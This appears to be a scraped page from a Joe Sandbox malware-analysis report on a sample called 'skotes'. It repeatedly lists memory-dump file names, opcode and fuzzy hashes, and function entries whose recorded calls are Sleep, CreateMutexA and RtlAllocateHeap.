Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b195dbc640d5d59a6f178e2e18c40a35424fabdc7e2b4ad3ba1a69fc7932998b
Instruction ID: 646678002a79af8d6b585ed59a2fce536fd67feaa890a0c39f06ddb5d73a7df5
Opcode Fuzzy Hash: b195dbc640d5d59a6f178e2e18c40a35424fabdc7e2b4ad3ba1a69fc7932998b
Instruction Fuzzy Hash: E83159317053049FEB08EBB8DC89BADB776EFC5314F248618E0249B2D5C77599809B92

Function 0090A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: bd25f5a6197dfef3a4a671880560233eb605c18816cd4f02d689fadd0ee8af0b
Instruction ID: 7ec18716b184f4adb4a14114f0a1f1b3332f8775dc74a995fa43d73d05704902
Opcode Fuzzy Hash: bd25f5a6197dfef3a4a671880560233eb605c18816cd4f02d689fadd0ee8af0b
Instruction Fuzzy Hash: F4312831B053049FEB18EB78DC89BADB7B6EFC5314F248658E024972D5C77599808792

Function 00909ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ad16d55462f891c8354ffd1b3dd46740df63ad27109658bd1a68cc6799ed2b79
Instruction ID: 61b03c36dbaaf7d0f83591dbf37e8a6c14941c6053b7b732ef1aa6a2d02ed919
Opcode Fuzzy Hash: ad16d55462f891c8354ffd1b3dd46740df63ad27109658bd1a68cc6799ed2b79
Instruction Fuzzy Hash: 3A216B317043049FEB18EBA8ECC576DF765EBD1310F24821DE424D76D5C7B599808751

Function 0090A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 722c9a7b1bc93c391b6732f9151cae38dd63b00c0186541aff5314878804755f
Instruction ID: fb3b9d11484e5360c9badff37a0c2bf10f40fb2329aba799b6ab7b0f24c64789
Opcode Fuzzy Hash: 722c9a7b1bc93c391b6732f9151cae38dd63b00c0186541aff5314878804755f
Instruction Fuzzy Hash: 78217C30749301DFFB24E7A9D89B73DB265DFC1310F248916E904D62D1CBBA598192E3

Function 0090A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 42e3b6340bb5e2cc3f95c009afbe6d22f6c96e9ba19ec285fe0903892c6c5ff8
Instruction ID: 56b0e8c0e3973e0b270d13987038d601349529813d07a0c038c335678d39989a
Opcode Fuzzy Hash: 42e3b6340bb5e2cc3f95c009afbe6d22f6c96e9ba19ec285fe0903892c6c5ff8
Instruction Fuzzy Hash: 6A2146327043049FEB18EB68EC8576DB7A6EBD2310F248219E424976D4C7B69AC08792

Function 0093D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0093A813,00000001,00000364,00000006,000000FF,?,0093EE3F,?,00000004,00000000,?,?), ref: 0093D871

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
